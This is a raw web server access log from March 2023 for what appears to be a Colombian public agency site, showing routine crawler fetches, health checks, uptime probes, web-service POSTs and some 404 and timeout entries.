172.22.2.4 - - [18/Mar/2023:03:12:09 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [18/Mar/2023:03:12:09 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
192.168.175.240 - - [18/Mar/2023:03:12:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:12:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
66.249.79.113 - - [18/Mar/2023:03:13:14 -0500] "GET /Publicaciones/2022EE42218.pdf HTTP/1.1" 404 227
216.245.221.92 - - [18/Mar/2023:03:13:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:13:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:12:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
66.249.79.115 - - [18/Mar/2023:03:14:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4176.pdf HTTP/1.1" 200 608188
64.124.8.56 - - [18/Mar/2023:03:14:37 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7486
192.168.175.240 - - [18/Mar/2023:03:14:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:13:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:15:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:14:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [18/Mar/2023:03:16:45 -0500] "GET / HTTP/1.1" 200 4720
45.238.182.137 - - [18/Mar/2023:03:17:10 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
192.168.175.240 - - [18/Mar/2023:03:17:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:17:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:03:18:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:18:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [18/Mar/2023:03:18:50 -0500] "GET /Publicaciones/2022EE45446.pdf HTTP/1.1" 404 227
64.124.8.56 - - [18/Mar/2023:03:19:02 -0500] "GET /svr-ciudadano/ HTTP/1.1" 200 137324
192.168.175.240 - - [18/Mar/2023:03:19:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:20:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41758
201.245.192.253 - - [18/Mar/2023:03:20:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43321
172.22.2.4 - - [18/Mar/2023:03:19:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:21:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:20:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
192.168.175.240 - - [18/Mar/2023:03:22:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:22:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:03:23:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:23:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.184 - - [18/Mar/2023:03:24:28 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:03:24:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:25:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:26:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:25:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Mar/2023:03:26:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [18/Mar/2023:03:27:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:27:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:03:28:37 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/Mar/2023:03:28:38 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
216.245.221.92 - - [18/Mar/2023:03:28:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:28:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:29:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:30:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41758
201.245.192.253 - - [18/Mar/2023:03:30:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43321
192.168.175.240 - - [18/Mar/2023:03:31:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:31:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:32:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:32:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
173.252.127.9 - - [18/Mar/2023:03:33:16 -0500] "GET /images/calidad-del-aire-suroccidental_optimized.jpeg HTTP/1.1" 200 175446
64.124.8.56 - - [18/Mar/2023:03:33:25 -0500] "-" 408 -
172.22.2.4 - - [18/Mar/2023:03:31:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
216.245.221.92 - - [18/Mar/2023:03:33:42 -0500] "HEAD / HTTP/1.1" 200 -
